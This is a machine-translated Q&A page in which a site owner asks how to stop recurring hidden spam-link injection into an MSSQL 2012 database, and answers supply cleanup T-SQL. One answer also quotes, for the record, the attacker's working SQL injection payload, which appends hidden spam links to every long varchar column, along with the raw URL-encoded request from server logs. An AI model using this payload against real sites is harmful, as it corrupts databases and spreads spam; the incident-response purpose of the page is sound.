注入隐藏垃圾链接的MSSQL Server,任何终极解决方案?
我正在使用MSSQL Server 2012.连接到此数据库的网站由ASP.NET C#2012开发。 最近我的数据库遭到黑客攻击或被垃圾邮件链接注入,它们都是相同的
<div style="display:none"> .....
在一些帮助下我创建了一个清除更新字段的函数,但问题是几天之后又发生了同样的事情!
我可以继续清理数据库,但我正在努力找到一个终极解决方案,以防止这种情况发生好......任何想法?
- 注意:我注意到更新的大多数列都是文本字段“nvarchar”。
2 个答案:
答案 0 :(得分:5)
就我而言,它也是通过未经验证的URL请求参数进行SQL注入。
让我们从明显的开始:
有趣的是(读:足够愚蠢),我为几个数据库配置了相同的SQL Server用户,导致不仅易受攻击的ASP.NET应用程序的数据库被泄露,而且还有其他非易受攻击的ASP.NET数据库应用程序在同一台服务器上。
清理
这是一个searches through all tables of one database的小型SQL脚本,并输出有问题的SQL query to cleanup the tables:
DECLARE
@search_string VARCHAR(100),
@table_name SYSNAME,
@table_id INT,
@column_name SYSNAME,
@sql_string VARCHAR(2000)
SET @search_string = 'display:none' -- The spammy text to search for.
DECLARE tables_cur CURSOR FOR SELECT name, object_id FROM sys.objects WHERE type = 'U'
OPEN tables_cur
FETCH NEXT FROM tables_cur INTO @table_name, @table_id
WHILE (@@FETCH_STATUS = 0)
BEGIN
DECLARE columns_cur CURSOR FOR SELECT name FROM sys.columns WHERE object_id = @table_id AND system_type_id IN (167, 175, 231, 239)
OPEN columns_cur
FETCH NEXT FROM columns_cur INTO @column_name
WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @sql_string = 'IF EXISTS (SELECT * FROM [' + @table_name + '] WHERE [' + @column_name + '] LIKE ''%' + @search_string + '%'') PRINT '' update [' + @table_name + '] set [' + @column_name + '] = substring([' + @column_name + '], 1, charindex(''''<'''', [' + @column_name + '])-1) where [' + @column_name + '] like ''''%<%'''''''
--PRINT @sql_string
EXECUTE(@sql_string)
FETCH NEXT FROM columns_cur INTO @column_name
END
CLOSE columns_cur
DEALLOCATE columns_cur
FETCH NEXT FROM tables_cur INTO @table_name, @table_id
END
CLOSE tables_cur
DEALLOCATE tables_cur
这不会为非受损数据库打印任何内容,例如:
update [MyTable1] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable2] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable3] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable4] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
之后您可以执行生成的SQL。
请注意,它从第一个<开始就删除了所有内容。这可能不适合某些有意包含Markup / HTML / XML的列。
让我们完成其他明显的事情:
注入SQL
仅针对记录或者如果有人感兴趣,这里是垃圾邮件发送者使用的提取的有效SQL:
declare @c cursor;
declare @d varchar(4000);
set @c=cursor for select 'update ['+TABLE_NAME+
'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+
']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''''
+char(60)+''div style="display:none"''+char(62)+
''go ''+char(60)+''a href="http:''+char(47)+char(47)+
''blog.armanda.com''+ char(47)+''page''+char(47)+
''women-who-cheat-with-
married-men.aspx"''+char(62)+case ABS(CHECKSUM(
NewId()))%3 when 0 then ''why do husbands cheat''
when 1 then ''reasons why husband cheat'' else
''want my wife to cheat'' end +char(60)+char(47)+
''a''+char(62)+'' My wife cheated on me''+
char(60)+char(47)+''div''+char(62)+'''' else ''''
end' FROM sysindexes AS i INNER JOIN sysobjects AS
o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and
DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1
or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin
exec (@d);
fetch next from @c into @d;
end;
close @c
我插入换行符以增强可读性。
直接来自服务器日志的原始URL如下所示:
/es/details.aspx,lid=15';declare%20@c%20cursor;declare%20@d%20varchar(4000);设置%20 @ C =光标%20for%20select%20'update% 20%5B '%2BTABLE_NAME%2B' %5D%20set%20%5B '%2BCOLUMN_NAME%2B' %5D =%5B '%2BCOLUMN_NAME%2B' %5D%2Bcase%20ABS(CHECKSUM(NEWID()))%257 %20when%200%20then%20 '' '' %2Bchar(60)%2B''div%20style =%22display:无%22 '' %2Bchar(62)%2B''go%20 '' %2Bchar( 60)%2B''a%20href =%22http: '' %2Bchar(47)%2Bchar(47)%2B''blog.armanda.com '' %2Bchar(47)%2B''page '' %2Bchar (47)%2B''women-谁作弊与 - 已婚men.aspx%22 '' %2Bchar(62)%2Bcase%20ABS(CHECKSUM(NEWID()))%253%20when%200%20then% 20''why%20do%20husbands%20cheat '' %20when%201%20then%20''reasons%20why%20husband%20cheat '' %20else%20''want%20my%20wife%20to%20cheat '' %20end %20%2Bchar(60)%2Bchar(47)%2B''a '' %2Bchar(62)%2B '' %20My%20wife%20cheated%20on%20me '' %2Bchar(60)%2Bchar(47) %2B''div '' %2Bchar(62)%2B '' '' %20else%20 '' '' %20end'%20FROM%20sysindexes%20AS%20I%20INNER%20JOIN%20sysobjects%20AS%20O%20ON% 20i.id = o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME = TA BLE_NAME%20WHERE(的indid = 0%20or%20indid = 1)%20于是%20DATA_TYPE%20like%20 '%25varchar' %20于是(CHARACTER_MAXIMUM_LENGTH = -1%20or%20CHARACTER_MAXIMUM_LENGTH = 2147483647);开放%20 @ C。;取%20next %20from%20 @ C%20into%20 @ d;而20%@@ FETCH_STATUS = 0%20begin%20exec%20(@d);取%20next%20from%20 @ C%20into%20 @ d; END;接近20%@ C_ -
答案 1 :(得分:0)
您将使用此代码
清除所有sql数据库表nvarchar列
update table_name set column_name=SUBSTRING(column_name,0,
CharIndex('<div style=\"display:none\">',column_name))
where column_name like '%<div style=\"display:none\">%'
- 我写了这段代码,但我无法理解我的错误
- 我无法从一个代码实例的列表中删除 None 值,但我可以在另一个实例中。为什么它适用于一个细分市场而不适用于另一个细分市场?
- 是否有可能使 loadstring 不可能等于打印?卢阿
- java中的random.expovariate()
- Appscript 通过会议在 Google 日历中发送电子邮件和创建活动
- 为什么我的 Onclick 箭头功能在 React 中不起作用?
- 在此代码中是否有使用“this”的替代方法?
- 在 SQL Server 和 PostgreSQL 上查询,我如何从第一个表获得第二个表的可视化
- 每千个数字得到
- 更新了城市边界 KML 文件的来源?